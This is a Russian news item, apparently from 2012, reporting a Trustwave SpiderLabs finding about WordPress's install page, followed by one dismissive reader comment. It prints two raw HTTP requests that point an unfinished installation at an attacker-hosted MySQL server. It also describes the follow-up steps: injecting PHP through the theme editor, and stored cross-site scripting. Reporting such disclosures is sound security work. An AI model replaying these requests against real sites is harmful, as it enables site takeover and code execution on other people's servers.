Специалисты TrustWave SpiderLabs обнаружили потенциальную уязвимость в установочной странице WordPress. При установке жертвой WordPress на инстанс MySQL злоумышленник может получить возможность выполнения PHP-кода и межсайтового скриптинга. Все проблемы характерны для версий движка, начиная с 3.3.1. В отчёте TrustWave SpiderLabs содержится описание найденных багов. Так, страница инсталляции setup-config.php предлагает возможность установить WordPress на локальный или удалённый инстанс MySQL. Однако, возможна ситуация, когда злоумышленник хостит свой собственный MySQL-сервер и завершает установку WordPress вместо пользователя, не имея реальных прав доступа. TrustWave SpiderLabs даже публикует сценарий атаки. 1. Злоумышленник хостит MySQL на W.X.Y.Z, порт 3306. 2. Злоумышленник осуществляет POST/GET запросы для установки туда WordPress. Code: Request #1 ---------- POST /wp-admin/setup-config.php?step=2 HTTP/1.1 Host: A.B.C.D User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:8.0.1) Gecko/20100101 Firefox/8.0.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip, deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Proxy-Connection: keep-alive Referer: http://A.B.C.D/wp-admin/setup-config.php?step=1 Cookie: wp-settings-time-1=1322687480; wp-settings-1=m9%3Do Content-Type: application/x-www-form-urlencoded Content-Length: 81 dbname=wordpress&uname=jsmith&pwd=jsmith&dbhost=W.X.Y.Z&prefix=wp_&submit=Submit Request #2 ---------- GET /wp-admin/install.php HTTP/1.1 Host: A.B.C.D User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:8.0.1) Gecko/20100101 Firefox/8.0.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip, deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Proxy-Connection: keep-alive Referer: http://A.B.C.D/wp-admin/setup-config.php?step=2 Cookie: wp-settings-time-1=1322687480; wp-settings-1=m9%3Do If-Modified-Since: Wed, 07 Dec 2011 16:03:33 GMT После того, как инсталляция завершена, злоумышленник может через «Редактор тем» вставить в блог вредоносный PHP-код. Кроме того, контролируя хранилище базы данных, можно использовать и Javascript, что приводит к возникновению постоянного межсайтового скриптинга. В рекомендациях также подчеркивается, что злоумышленник может посредством JavaScript’а подставлять свои собственные значения в поля dbname, dbhost или uname. Между тем, официальные представители WordPress сказали, что не будут исправлять указанные недочёты. По их словам, вероятность того, что пользователь, который начал установку WordPress, не завершит её в максимально короткое время слишком мала. У злоумышленников остается слишком мало времени, чтобы воспользоваться найденным уязвимостями. Дата: 27.01.2012 http://www.xakep.ru/post/58191/
Тоже мне уязвимость. Это не баг, а фича, как говорится. Как он еще не обнаружил, что если у злоумышленника есть пароль и логин от админки ВП, то это ведет к уязвимости php execution and xss?